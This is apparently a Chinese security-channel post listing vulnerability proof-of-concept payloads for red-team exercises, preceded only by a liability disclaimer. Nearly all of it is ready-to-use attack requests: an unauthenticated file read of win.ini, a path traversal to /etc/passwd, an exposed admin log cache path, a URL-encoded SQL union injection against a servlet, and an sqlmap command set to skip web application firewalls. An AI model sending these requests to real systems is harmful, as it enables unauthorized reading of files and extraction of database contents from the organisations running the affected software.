HW | 乐子推送&漏洞POC更新第四弹

免责声明  由于传播、利用湘安无事所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，湘安无事及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

url+/runtime/admin_log_conf.cache

url+/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini

GET /../etc/passwd HTTP/1.1 Host: Accept: / Content-Type: application/x-www-form-urlencoded

GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hellohongjingHcm~27~2cdb~5fname~28~29~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 14 3) AppleWebKit/605.1.15 (KHTML.like Gecko) 5bGx5rW35LmL5YWzAccept-Encoding: gzip, deflateConnection: close

POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1Host: Connection: closeCache-Control: max-age=0sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Language: zh-CN,zh;q=0.9Cookie: ****Content-Type: application/x-www-form-urlencodedContent-Length: 39checkname=123&tagid=123sqlmap -u "https://****/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" -v3 --skip-waf --random-agent